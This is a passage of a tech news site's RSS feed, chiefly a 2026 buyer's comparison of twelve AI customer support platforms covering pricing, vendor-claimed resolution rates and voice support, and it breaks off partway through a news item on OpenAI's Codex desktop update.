<li><a href="https://llm-stats.com/benchmarks/truthfulqa">TruthfulQA leaderboard at llm-stats.com</a></li>
<li><a href="https://pricepertoken.com/leaderboards/benchmark/simpleqa">SimpleQA leaderboard at pricepertoken.com</a></li>
<li><a href="https://arxiv.org/abs/2501.03200">FACTS Grounding paper (arxiv 2501.03200)</a></li>
<li><a href="https://deepmind.google/blog/facts-grounding-a-new-benchmark-for-evaluating-the-factuality-of-large-language-models/">FACTS Grounding - Google DeepMind blog</a></li>
<li><a href="https://github.com/vectara/hallucination-leaderboard">Vectara hallucination leaderboard (GitHub)</a></li>
<li><a href="https://www.vectara.com/blog/introducing-the-next-generation-of-vectaras-hallucination-leaderboard">Vectara next-gen leaderboard announcement</a></li>
<li><a href="https://arxiv.org/abs/2305.11747">HaluEval paper (arxiv 2305.11747)</a></li>
<li><a href="https://arxiv.org/abs/2504.17550">HalluLens paper (arxiv 2504.17550)</a></li>
<li><a href="https://artificialanalysis.ai/evaluations/omniscience">AA-Omniscience benchmark - Artificial Analysis</a></li>
<li><a href="https://arxiv.org/abs/2310.00741">FELM paper (arxiv 2310.00741)</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/hallucination-benchmarks-leaderboard_hu_89f6d3fa38acfbf5.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/hallucination-benchmarks-leaderboard_hu_89f6d3fa38acfbf5.jpg" width="1200" height="675"/></item><item><title>Best AI Customer Support Tools 2026: 12 Platforms</title><link>https://awesomeagents.ai/tools/best-ai-customer-support-tools-2026/</link><pubDate>Fri, 17 Apr 2026 20:08:49 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-customer-support-tools-2026/</guid><description>&lt;p>Customer support AI has split into two distinct leagues. On one side sit the incumbents - Zendesk, Salesforce, HubSpot - bolting AI onto existing seat-based products. On the other are purpose-built AI-native players like Intercom Fin, Decagon, Sierra, and Ada, which rebuilt the product layer around resolution-based outcomes from the start. The pricing model difference matters more than feature lists: per-seat pricing incentivizes adding agents, per-resolution pricing forces vendors to actually solve tickets.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Customer support AI has split into two distinct leagues. On one side sit the incumbents - Zendesk, Salesforce, HubSpot - bolting AI onto existing seat-based products. On the other are purpose-built AI-native players like Intercom Fin, Decagon, Sierra, and Ada, which rebuilt the product layer around resolution-based outcomes from the start. The pricing model difference matters more than feature lists: per-seat pricing incentivizes adding agents, per-resolution pricing forces vendors to actually solve tickets.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>Best for mid-market SaaS and consumer tech:</strong> Intercom Fin 3 at $0.99/resolution, 66% average resolution rate across 6,000+ customers, voice included</li>
<li><strong>Best for e-commerce:</strong> Gorgias AI at $0.90-$1.00/automated resolution - native Shopify/BigCommerce order data in every ticket</li>
<li><strong>Best for large enterprise with Salesforce investment:</strong> Agentforce at $2/conversation, but the TCO is high once Service Cloud licenses stack up</li>
<li>Decagon and Sierra are the most credible pure-play options for enterprises willing to pay minimum-contract rates; both have real deployment data (Chime, Substack, Rivian, SiriusXM)</li>
<li>Forethought is now part of Zendesk after a March 2026 acquisition - buying it today means buying into the Zendesk ecosystem</li>
<li>Resolution rate marketing numbers are largely unverified vendor claims; treat them as upper bounds, not baselines</li>
</ul>
</div>
<p>This comparison covers 12 platforms across the following dimensions: pricing model, verified resolution claims, channel coverage (web chat, email, voice, WhatsApp), helpdesk integration depth, voice agent support, workflow flexibility, self-hosting options, and publicly named customer deployments.</p>
<hr>
<h2 id="how-to-read-the-comparison-table">How to Read the Comparison Table</h2>
<p>&quot;Resolution rate&quot; numbers in this article come directly from vendor marketing materials unless otherwise noted. Vendors control the definition of &quot;resolved&quot; - some require a customer confirmation click, others count any conversation that didn't escalate. That makes cross-vendor comparisons unreliable. Where I have third-party deployment data (Klarna, Chime, Substack), I've called it out explicitly.</p>
<table>
  <thead>
      <tr>
          <th>Platform</th>
          <th>Pricing model</th>
          <th>Published resolution rate</th>
          <th>Voice</th>
          <th>Self-host</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Intercom Fin 3</td>
          <td>$0.99/resolution</td>
          <td>66% avg (Fin 2 data)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Zendesk AI Agents</td>
          <td>$1.50-$2.00/automated resolution</td>
          <td>Not published</td>
          <td>Via add-on</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Agentforce (Salesforce)</td>
          <td>$2.00/conversation + seat licenses</td>
          <td>Not published</td>
          <td>Via SFDC CC</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Decagon</td>
          <td>Contact sales (enterprise)</td>
          <td>70-90% (customer-specific)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Sierra</td>
          <td>$150K+/year minimum</td>
          <td>Not published</td>
          <td>Yes (voice-first)</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Ada</td>
          <td>~$30K/year minimum, ~$1-$3.50/resolution</td>
          <td>Not published</td>
          <td>Via integration</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Forethought (now Zendesk)</td>
          <td>Custom quote (~$56K/year median)</td>
          <td>Up to 98% (vendor claim)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Kustomer</td>
          <td>$0.60/engaged conversation + $89/seat base</td>
          <td>40% (Vuori deployment)</td>
          <td>Yes (native)</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Crescendo</td>
          <td>$2.99/resolution + $2,900/month base</td>
          <td>70-90% (vendor claim)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Gorgias AI</td>
          <td>$0.90-$1.00/automated resolution</td>
          <td>60% (vendor claim)</td>
          <td>No</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Help Scout AI</td>
          <td>$0.75/AI-resolved conversation</td>
          <td>Not published</td>
          <td>No</td>
          <td>No</td>
      </tr>
      <tr>
          <td>HubSpot Service Hub</td>
          <td>~$1/conversation (Breeze credits)</td>
          <td>Not published</td>
          <td>No (native)</td>
          <td>No</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="intercom-fin-3---best-overall-for-saas-support">Intercom Fin 3 - Best Overall for SaaS Support</h2>
<p>Fin 3 shipped at Intercom's Pioneer 2025 event and is the most significant platform update in the product's history. The jump from Fin 2 to Fin 3 isn't gradual: Procedures replace the old content-matching approach with a system combining natural language instructions and deterministic controls. You write the resolution logic in plain English, add API connectors and conditional branches, and Fin executes them as workflows - processing refunds, verifying account status, filing claims.</p>
<p>The Fin 2 dataset is the most credible published resolution benchmark in the category: 66% average across 6,000+ customers, with over 20% of those customers topping 80%. Intercom also offers a 50% automation rate guarantee - if Fin resolves less than half the conversations it touches, they credit back the difference.</p>
<p>Pricing is $0.99 per outcome. An outcome is a resolution (customer confirms issue solved), or a successful Procedure handoff. You pay once per conversation regardless of how many exchanges it took. Plans start at $29/month/seat (Essential), $85/month (Advanced), $132/month (Expert), with Fin billed separately.</p>
<h3 id="whats-new-in-fin-3">What's new in Fin 3</h3>
<ul>
<li><strong>Simulations</strong> - automated test suites that run Procedures against synthetic customer scenarios before you deploy. This is a genuine engineering QA feature, not a marketing checkbox.</li>
<li><strong>Expanded channels</strong> - Slack and Discord support added. Voice latency dropped 30-40% and now covers 28 languages.</li>
<li><strong>Multimodal inputs</strong> - Fin can read screenshots and invoice images customers attach to conversations, reducing &quot;I can't read what you sent&quot; escalations.</li>
</ul>
<p><strong>Weakness:</strong> Fin is deeply tied to the Intercom platform. If you're on Zendesk or Freshdesk, deploying Fin means either migrating your helpdesk or running two systems in parallel. Intercom doesn't offer a standalone &quot;Fin layer&quot; over third-party ticketing.</p>
<p><strong>Deployment scale:</strong> Intercom hasn't published a curated deployment list with resolution numbers, but claims 40M+ resolved conversations across all Fin customers.</p>
<hr>
<h2 id="zendesk-ai-agents---best-for-existing-zendesk-shops">Zendesk AI Agents - Best for Existing Zendesk Shops</h2>
<p>Zendesk picked up Ultimate AI in May 2023 and spent the following 18 months integrating it into Suite. The result is two AI agent tiers built into the Suite platform.</p>
<p>The Essential tier - included with all Suite plans - generates responses from your Help Center content without configuration. The Advanced tier ($50/agent/month add-on for Suite Professional at $115/agent/month) adds hybrid conversation flows combining generative AI with scripted paths, API orchestration, and analytics.</p>
<p>Automated resolution pricing is separate: each plan includes a free AR quota per agent per month. Beyond that, you pay $1.50/AR on committed volume or $2.00/AR on pay-as-you-go. The Ultimate tier runs $139/agent/month and includes skill-based routing, live dashboards, and extended API limits.</p>
<p>The Forethought acquisition (March 2026) is strategically significant. Zendesk's largest acquisition in nearly two decades, Forethought adds five AI &quot;agents&quot; - Solve, Triage, Assist, Discover, and Agent QA - that work across email, chat, voice, and SMS. If you're already on Zendesk, the combined platform is now the most feature-complete option in the market. If you're not, the switching cost is high.</p>
<p><strong>Voice:</strong> Available via Zendesk Talk, priced separately. Not native to the AI agent tier.</p>
<p><strong>Weakness:</strong> The per-seat pricing model means AI costs compound on top of agent seat costs. A team of 50 agents on Suite Professional is already paying $5,750/month before AI adds and AR charges.</p>
<hr>
<h2 id="agentforce-salesforce-einstein-service-ai---best-for-salesforce-shops">Agentforce (Salesforce Einstein Service AI) - Best for Salesforce Shops</h2>
<p>Salesforce rebranded Einstein Service Agent to Agentforce in late 2024. The pitch is autonomous customer self-service without pre-scripted flows - the agent uses a reasoning engine to interpret requests, check Salesforce CRM data, and take action.</p>
<p>The numbers are painful if you're not already embedded in the Salesforce ecosystem. Service Cloud Enterprise runs $165/user/month. Service Cloud Unlimited is $330/user/month. Agentforce conversations are billed at $2 each. A team running 15,000 AI conversations per month faces $30,000/month in conversation costs before licenses.</p>
<p>The implementation timeline is a real constraint: basic Einstein configuration takes 4-8 weeks and usually requires a certified Salesforce partner. A full Agentforce rollout is 3-6 months. Compare that to Fin or Decagon, which ship in days.</p>
<p><strong>What it does well:</strong> If your support data lives in Salesforce CRM - cases, entitlements, contact history, product catalogs - Agentforce's data access is unmatched. No API calls to external systems; it queries your Salesforce org directly. For regulated industries with strict data residency requirements, that's a real advantage.</p>
<p><img src="/images/tools/best-ai-customer-support-tools-2026-team-dashboard.jpg" alt="Customer service team reviewing dashboard analytics">
<em>Support teams using AI platforms spend less time on ticket routing and more time reviewing performance analytics and exception handling.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="decagon---best-pure-play-agentic-option">Decagon - Best Pure-Play Agentic Option</h2>
<p>Decagon is the quietest name on this list and has the most credible third-party resolution numbers. Chime reported 70% AI resolution across chat and voice. Substack reached 90% resolution without human intervention. Bilt Rewards reported 75%. NG.CASH grew autonomous resolution from 13% to 70% over its deployment period.</p>
<p>Those numbers come from publicly verified customer case studies, not aggregate vendor dashboards. That's a meaningful distinction.</p>
<p>Decagon doesn't publish pricing - it's enterprise-only with custom contracts. Third-party sources put it in the same range as Sierra: six-figure annual commitments. The platform supports chat, email, and voice, with deep integrations into Zendesk, Salesforce, and Intercom for helpdesk data access.</p>
<p><strong>What makes Decagon different:</strong> It's not built on a rules engine. Decagon models are trained on each customer's historical support data, producing resolution behavior tuned to that company's specific product and customer patterns. This takes longer to implement than a configuration-based tool, but the resolution accuracy on complex queries is higher.</p>
<p><strong>Weakness:</strong> No self-serve or SMB tier. Decagon won't make sense unless your support volume justifies a dedicated AI implementation project.</p>
<hr>
<h2 id="sierra---best-for-voice-first-enterprise-support">Sierra - Best for Voice-First Enterprise Support</h2>
<p>Sierra, co-founded by Bret Taylor (former Salesforce co-CEO) and Clay Bavor, reached $100M ARR in November 2025 - 21 months after launch. The company was valued at $10 billion following a $350M Greenoaks round in September 2025.</p>
<p>Sierra's positioning is outcomes-based pricing, with contracts starting at $150K/year. Customers include ADT, Bissell, SiriusXM, Cigna, Ramp, Rivian, Discord, and Vans. The mix of tech-native and legacy enterprise deployments is notable - most AI-native support vendors have consumer tech customer lists. Sierra's presence at SiriusXM and Cigna suggests the platform handles regulated, complex support workflows.</p>
<p>Voice is Sierra's strongest differentiator. Most platforms in this list treat voice as a channel add-on. Sierra was voice-first from the beginning and the product architecture reflects it.</p>
<blockquote>
<p>&quot;The era of clicking buttons is over,&quot; Taylor told TechCrunch in April 2026. The implication is that Sierra's agents handle multi-step resolution on the phone, not just deflection.</p></blockquote>
<p><strong>Weakness:</strong> The $150K/year minimum excludes everyone except large enterprises. No published resolution rates from Sierra directly - customer case studies are NDA-protected.</p>
<hr>
<h2 id="ada---established-enterprise-chatbot-layer">Ada - Established Enterprise Chatbot Layer</h2>
<p>Ada has been in the enterprise support automation market since 2016. It's the oldest purpose-built AI support vendor on this list and has built deep integrations with Zendesk and Salesforce. The current product supports web chat, email, and mobile channels with voice available via integrations.</p>
<p>Pricing starts at approximately $30,000/year (per the Salesforce AppExchange listing), with enterprise deals reported in the $100K-$300K range. Resolution pricing is $1-$3.50 per resolved conversation depending on volume and configuration. That upper end gets expensive fast at scale.</p>
<p>Ada is honest in its own pricing guide about the tradeoffs between resolution-based and conversation-based models. Resolution-based pricing creates better incentives: you only pay when the AI actually closes the ticket.</p>
<p><strong>Weakness:</strong> Ada is genuinely expensive and opaque on pricing. The per-resolution rate of $3.50 at low volumes competes unfavorably with Fin's $0.99 flat rate.</p>
<hr>
<h2 id="forethought-now-part-of-zendesk">Forethought (Now Part of Zendesk)</h2>
<p>Zendesk announced the acquisition of Forethought on March 11, 2026 - its largest deal in two decades. The transaction closed by end of March 2026. Today, Forethought operates as a Zendesk product.</p>
<p>If you're assessing Forethought independently, understand what you're buying into. It's now a Zendesk product roadmap. That may be fine - Zendesk has the scale to invest in the technology. But independent Forethought deployments over non-Zendesk helpdesks are likely to see reduced investment over time.</p>
<p>Forethought's five-agent architecture (Solve for automated resolution, Triage for routing, Assist for agent recommendations, Discover for knowledge gaps, Agent QA for quality scoring) is the most thorough AI layer in the category if your helpdesk is already Zendesk. Median contract value before acquisition ran around $56,000-$60,000/year.</p>
<p>Forethought's published resolution claim - &quot;up to 98%&quot; - isn't independently verified. Take it as a best-case ceiling, not an average.</p>
<hr>
<h2 id="kustomer---metas-crm-first-approach">Kustomer - Meta's CRM-First Approach</h2>
<p>Meta acquired Kustomer in 2020 and spun it back out as an independent company in 2023. The current Kustomer product is one of the few platforms on this list that combines a full customer CRM (conversation history, customer profiles, lifetime value data) with native AI agents.</p>
<p>The October 2024 relaunch introduced &quot;disruptive pricing&quot; - conversation-based billing at $0.60 per engaged AI conversation for the customer-facing agent. That's the cheapest per-conversation rate in this comparison. The catch: you pay when the AI engages, not when it resolves. A deflected conversation that fails and escalates still costs $0.60.</p>
<p>Kustomer AI Voice is included at no extra cost beyond standard telephony. That's genuinely competitive: Sierra and Decagon charge enterprise minimums for voice. Kustomer's AI voice is available to anyone on the $89/seat plan.</p>
<p>The Vuori case study is the clearest public deployment data Kustomer has published: 40% of chat conversations resolved by AI without human intervention. That's below Fin and Decagon averages, but Vuori is an apparel e-commerce brand, not a software company - and product return/exchange flows are truly harder to automate than software FAQs.</p>
<hr>
<h2 id="crescendo---managed-ai-plus-human-backup">Crescendo - Managed AI Plus Human Backup</h2>
<p>Crescendo takes a different model: it's not a pure software platform. The service combines AI agents with a team of 3,000+ human agents who handle anything the AI can't resolve. You're outsourcing customer support operations, not just buying software.</p>
<p>Pricing reflects this: $2.99/resolution plus a $2,900/month platform fee. That's higher per-resolution than most alternatives, but it includes 24/7 human coverage, 50+ language support, and quality assurance - services that cost extra elsewhere.</p>
<p>The vendor claims 70-90% AI resolution with 99.8% accuracy. The accuracy number is unverified. The value proposition is clearest for companies that want to remove their internal support operations entirely rather than augment an existing team.</p>
<p><img src="/images/tools/best-ai-customer-support-tools-2026-chatbot-interface.jpg" alt="AI customer support chat interface on a screen">
<em>AI support platforms surface knowledge base answers and customer history directly inside the chat interface, reducing time-to-resolution.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="gorgias-ai---best-for-e-commerce">Gorgias AI - Best for E-Commerce</h2>
<p>Gorgias is the only platform here built specifically for e-commerce, and its 15,000+ brand customers (Kith, Arc'teryx, Reebok) confirm the fit. Every ticket opens with the customer's full order history, shipping status, and return eligibility visible alongside the conversation - no tab-switching, no manual CRM lookup.</p>
<p>The AI Agent feature resolves 60% of support inquiries according to Gorgias's own data. Pricing for AI automation is $1.00/automated resolved conversation on monthly billing, or $0.90 on annual. Note the double-billing structure: you also pay the helpdesk ticket charge on top of the AI automation fee.</p>
<p>If you're not in e-commerce, Gorgias has limited value. The product doesn't handle SaaS subscription workflows, doesn't integrate cleanly with Salesforce, and lacks the deep customization options that enterprise support teams need.</p>
<p><strong>Voice:</strong> Gorgias doesn't offer native voice. This is a live chat, email, and social messaging tool.</p>
<hr>
<h2 id="help-scout-ai---best-budget-option-for-small-teams">Help Scout AI - Best Budget Option for Small Teams</h2>
<p>Help Scout is the simplest platform in this comparison. It's a shared inbox tool for small support teams with AI features layered on top: AI Answers (customer-facing chatbot), AI Drafts (agent reply suggestions), AI Assist (tone and translation), and AI Summarize (thread condensing).</p>
<p>Plans run $25/user/month (Standard), $45/user/month (Plus), and $75/user/month (Pro). AI Answers costs $0.75 per AI-resolved conversation, the lowest published per-resolution rate in the market. New accounts get three months of unlimited AI Answers free.</p>
<p>The AI Answers chatbot is straightforward: it answers from your Docs knowledge base and hands off to a human if it can't resolve. There's no voice support, no advanced workflow engine, no enterprise integrations beyond standard web hooks. For a 5-20 person support team that wants deflection on simple FAQ traffic without a six-figure contract, Help Scout is the right starting point.</p>
<hr>
<h2 id="hubspot-service-hub-ai---best-for-hubspot-centric-teams">HubSpot Service Hub AI - Best for HubSpot-Centric Teams</h2>
<p>HubSpot's Breeze AI Customer Agent is available in Service Hub Professional ($90/seat/month) and Enterprise ($150/seat/month). The AI works inside the HubSpot CRM - it sees every customer interaction, deal, and support ticket in the same data model.</p>
<p>The pricing structure uses Breeze credits: $10 per 1,000 credits. Customer Agent consumes 100 credits per conversation, which works out to roughly $1 per conversation. Plans include a 3,000-credit allocation (roughly 30 conversations) per seat per month.</p>
<p>For teams already using HubSpot for sales and marketing, the Service Hub AI makes sense: it runs on the same data without any integration work. For teams not in the HubSpot ecosystem, the seat cost is hard to justify when Fin or Help Scout covers the same resolution workflow at lower cost per conversation.</p>
<hr>
<h2 id="pricing-model-comparison">Pricing Model Comparison</h2>
<p>This table covers only publicly published pricing. &quot;Contact sales&quot; means the vendor has no published list price.</p>
<table>
  <thead>
      <tr>
          <th>Platform</th>
          <th>Base fee</th>
          <th>Per-unit cost</th>
          <th>Minimum commitment</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Intercom Fin 3</td>
          <td>$29/seat/month</td>
          <td>$0.99/resolution</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Help Scout AI</td>
          <td>$25/seat/month</td>
          <td>$0.75/AI resolution</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Kustomer</td>
          <td>$89/seat/month</td>
          <td>$0.60/AI conversation</td>
          <td>8 seats</td>
      </tr>
      <tr>
          <td>Gorgias AI</td>
          <td>Ticket-based plans</td>
          <td>$0.90-$1.00/AI resolution</td>
          <td>None</td>
      </tr>
      <tr>
          <td>HubSpot Service Hub</td>
          <td>$90/seat/month</td>
          <td>~$1.00/AI conversation</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Zendesk + Advanced AI</td>
          <td>$115/seat/month</td>
          <td>$1.50-$2.00/AR</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Crescendo</td>
          <td>$2,900/month</td>
          <td>$2.99/resolution</td>
          <td>Monthly</td>
      </tr>
      <tr>
          <td>Ada</td>
          <td>~$30K/year</td>
          <td>~$1.00-$3.50/resolution</td>
          <td>~$30K/year</td>
      </tr>
      <tr>
          <td>Agentforce</td>
          <td>$165/seat/month</td>
          <td>$2.00/conversation</td>
          <td>None</td>
      </tr>
      <tr>
          <td>Decagon</td>
          <td>Contact sales</td>
          <td>Contact sales</td>
          <td>~$100K/year (est.)</td>
      </tr>
      <tr>
          <td>Sierra</td>
          <td>Contact sales</td>
          <td>Contact sales</td>
          <td>~$150K/year</td>
      </tr>
      <tr>
          <td>Forethought</td>
          <td>Contact sales</td>
          <td>Contact sales</td>
          <td>~$56K/year (est.)</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="the-klarna-reference-point">The Klarna Reference Point</h2>
<p>Klarna's public deployment data is the most cited benchmark in AI customer support and worth looking at directly. In the first month of running their Anthropic-powered assistant, Klarna handled 2.3 million conversations through AI - two-thirds of all customer service interactions. Resolution time dropped from 11 minutes to 2 minutes. Klarna says customer satisfaction scores held steady at human-agent parity.</p>
<p>The assistant does the equivalent work of 700 full-time agents and saved $60 million. Per-transaction customer service costs fell 40% over two years.</p>
<p>Two things are true simultaneously: those numbers are impressive and Klarna had to walk back its &quot;AI-first&quot; strategy partially in 2025, reintroducing human agents for complex cases. The 75% self-resolution rate was real, but the 25% of cases that escalated required more human expertise than the cost savings justified removing. Pure deflection rates overstate deployment success; what matters is whether customers with complex problems still get resolved.</p>
<p>None of the 12 platforms in this article built Klarna's custom infrastructure. They offer configurable AI on top of existing helpdesk data. Klarna's numbers are the ceiling, not the benchmark.</p>
<hr>
<h2 id="best-picks">Best Picks</h2>
<p><strong>Best overall - mid-market SaaS, consumer tech, fintech:</strong> Intercom Fin 3. The $0.99/resolution pricing is the fairest cost model in the market, the Fin 2 resolution data is the largest published dataset in the category, and Fin 3's Procedures give engineering teams genuine workflow control without hard-coding. The 50% automation rate guarantee removes pricing risk during ramp-up.</p>
<p><strong>Best for e-commerce brands:</strong> Gorgias AI. The order-context-in-every-ticket feature removes the primary friction in e-commerce support. At $0.90/resolved conversation on annual billing, it's cost-competitive with Fin for the right workload.</p>
<p><strong>Best for enterprise with Salesforce investment:</strong> Agentforce. The data access story is compelling if your customer records live in Salesforce. At $2/conversation the cost model gets expensive, but the integration depth justifies it for teams that have already built on Service Cloud.</p>
<p><strong>Best budget option for small teams:</strong> Help Scout AI at $0.75/AI-resolved conversation is the lowest published per-resolution rate in the market and requires no long-term contract.</p>
<p><strong>For complex enterprise deployments with voice requirements:</strong> Sierra or Decagon, depending on whether your budget supports a $150K+ minimum. Both have credible public deployment data and neither requires buying into a separate helpdesk vendor.</p>
<p>If you're evaluating general-purpose AI agent frameworks rather than support-specific products, the <a href="/tools/best-ai-agent-frameworks-2026">best AI agent frameworks for 2026</a> covers the build-vs-buy tradeoff from an engineering perspective. For teams wanting to build custom support bots on top of LLM infrastructure, <a href="/tools/best-ai-chatbot-builders-2026">best AI chatbot builders 2026</a> covers the low-code and no-code build options.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="whats-the-cheapest-ai-customer-support-option-that-actually-works">What's the cheapest AI customer support option that actually works?</h3>
<p>Help Scout AI at $0.75/AI-resolved conversation is the lowest published per-resolution rate, with no minimum contract. For small teams under 20 agents, the platform plus AI tier runs under $2,500/month total.</p>
<h3 id="which-platforms-support-voice-ai-natively">Which platforms support voice AI natively?</h3>
<p>Sierra (voice-first architecture), Kustomer (native at no extra cost), Intercom Fin 3 (28 languages, 30-40% latency improvement in v3), Decagon (voice included), and Crescendo (managed voice included in base fee). Zendesk and HubSpot handle voice via separate telephony products.</p>
<h3 id="can-any-of-these-tools-be-self-hosted">Can any of these tools be self-hosted?</h3>
<p>No platform in this comparison offers a self-hosted tier. If data residency or self-hosting is a hard requirement, you'd need to evaluate open-source alternatives or build on models running in your own infrastructure. The <a href="/tools/best-ai-agent-frameworks-2026">best AI agent frameworks</a> covers open-source options.</p>
<h3 id="is-forethought-still-worth-evaluating-after-the-zendesk-acquisition">Is Forethought still worth evaluating after the Zendesk acquisition?</h3>
<p>For teams already on Zendesk, yes - the combined platform is the most feature-complete in the category. For teams on other helpdesks, assess with caution: Forethought's roadmap now runs through Zendesk's product priorities.</p>
<h3 id="what-does-resolution-rate-actually-mean-across-vendors">What does &quot;resolution rate&quot; actually mean across vendors?</h3>
<p>It differs by vendor. Intercom counts a resolution when a customer confirms the issue is solved or doesn't escalate after Fin's reply. Kustomer's 40% Vuori figure counts conversations where no human agent took over. Decagon's numbers come from customer case studies with customer-defined definitions. There's no industry standard, so compare cautiously.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.intercom.com/pricing">Intercom Fin AI Pricing</a> - official Intercom pricing page with $0.99/outcome model</li>
<li><a href="https://www.intercom.com/blog/whats-new-with-fin-3/">Fin 3 announcement - The Intercom Blog</a> - Fin 3 features, Fin 2 resolution rate (66% avg), Simulations and Procedures details</li>
<li><a href="https://www.eesel.ai/blog/zendesk-suite-pricing">Zendesk Suite Pricing Guide - eesel AI</a> - Suite plan tiers and AI add-on costs breakdown</li>
<li><a href="https://support.zendesk.com/hc/en-us/articles/6970583409690-About-AI-agents">Zendesk AI Agents - About AI agents</a> - AR pricing tiers ($1.50/$2.00)</li>
<li><a href="https://techcrunch.com/2025/11/21/bret-taylors-sierra-reaches-100m-arr-in-under-two-years/">Sierra reaches $100M ARR - TechCrunch</a> - $100M ARR in 21 months, November 2025</li>
<li><a href="https://techcrunch.com/2024/10/28/bret-taylors-customer-service-ai-startup-just-raised-175m/">Sierra raises $175M - TechCrunch</a> - fundraising history; $350M/10B valuation reported separately in September 2025</li>
<li><a href="https://techcrunch.com/2026/04/09/sierras-bret-taylor-says-the-era-of-clicking-buttons-is-over/">Sierra's Bret Taylor: era of clicking buttons is over - TechCrunch</a> - April 2026 interview</li>
<li><a href="https://www.customerexperiencedive.com/news/klarna-ai-slash-customer-service-costs/748647/">Klarna AI customer service costs - CX Dive</a> - $60M savings, 40% per-transaction cost reduction, 2.3M conversations handled</li>
<li><a href="https://www.cmswire.com/the-wire/kustomer-launches-the-first-ai-native-customer-service-platform/">Kustomer AI-Native Platform Launch - CMSWire</a> - October 2024 relaunch, $0.60/engaged conversation pricing, native voice</li>
<li><a href="https://www.helpscout.com/pricing/">Help Scout Pricing</a> - official Help Scout pricing, $0.75/AI resolution</li>
<li><a href="https://www.crescendo.ai/pricing">Crescendo Pricing</a> - $2.99/resolution + $2,900/month base</li>
<li><a href="https://www.eesel.ai/blog/gorgias-ai-pricing-complete-2025-cost-breakdown-and-guide">Gorgias AI Pricing - eesel AI analysis</a> - $0.90-$1.00/automated resolution breakdown</li>
<li><a href="https://www.featurebase.app/blog/ada-cx-pricing">Ada CX pricing anchor - Featurebase analysis</a> - $30K/year minimum, $1-$3.50/resolution range</li>
<li><a href="https://www.salesforce.com/agentforce/">Salesforce Agentforce</a> - official Agentforce product page</li>
<li><a href="https://forethought.ai/">Zendesk acquires Forethought - Forethought.ai</a> - March 2026 acquisition announcement</li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-customer-support-tools-2026_hu_79a90d837bbdca8e.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-customer-support-tools-2026_hu_79a90d837bbdca8e.jpg" width="1200" height="675"/></item><item><title>OpenAI Gives Codex Desktop Control and 111 Plugins</title><link>https://awesomeagents.ai/news/openai-codex-computer-use-parallel-agents/</link><pubDate>Fri, 17 Apr 2026 19:56:49 +0200</pubDate><guid>https://awesomeagents.ai/news/openai-codex-computer-use-parallel-agents/</guid><description>&lt;p>OpenAI shipped a major update to its Codex desktop app on April 16, adding background computer use for Mac, an in-app browser built on its Atlas engine, image generation via gpt-image-1.5, and 111 new plugins. Together, these features push Codex from an agentic coding assistant into something closer to a general-purpose desktop automation layer. The timing isn't subtle: Anthropic announced remote Mac control for &lt;a href="/news/claude-code-desktop-redesign-parallel-agents/">Claude Code last month&lt;/a>, and OpenAI is now matching it feature for feature.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>OpenAI shipped a major update to its Codex desktop app on April 16, adding background computer use for Mac, an in-app browser built on its Atlas engine, image generation via gpt-image-1.5, and 111 new plugins. Together, these features push Codex from an agentic coding assistant into something closer to a general-purpose desktop automation layer. The timing isn't subtle: Anthropic announced remote Mac control for <a href="/news/claude-code-desktop-redesign-parallel-agents/">Claude Code last month</a>, and OpenAI is now matching it feature for feature.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Codex can now see and operate Mac apps in the background using its own cursor, with multiple agents running in parallel</li>
<li>A built-in browser based on OpenAI's Atlas engine lets users comment directly on pages during development</li>
<li>111 new plugins add integrations with Atlassian Rovo, CircleCI, CodeRabbit, GitLab Issues, Microsoft Suite, and Render</li>
<li>Computer use is blocked in the EU, UK, and Switzerland; memory is unavailable for Enterprise, Education, EU, and UK accounts</li>
</ul>
</div>
<p>The table below shows where Codex now stands against Anthropic's Claude Code across the features that matter most for agentic development workflows.</p>
<table>
  <thead>
      <tr>
          <th>Feature</th>
          <th>Codex (April 2026)</th>
          <th>Claude Code</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Computer use</td>
          <td>Yes - Mac only, excl. EU/UK/CH</td>
          <td>Yes - Mac and desktop</td>
      </tr>
      <tr>
          <td>Parallel agents</td>
          <td>Yes</td>
          <td>Yes (since April 15 rebuild)</td>
      </tr>
      <tr>
          <td>In-app browser</td>
          <td>Atlas-based, localhost for now</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Image generation</td>
          <td>gpt-image-1.5</td>
          <td>No native image gen</td>
      </tr>
      <tr>
          <td>Plugin integrations</td>
          <td>111</td>
          <td>MCP servers (no fixed count)</td>
      </tr>
      <tr>
          <td>Memory</td>
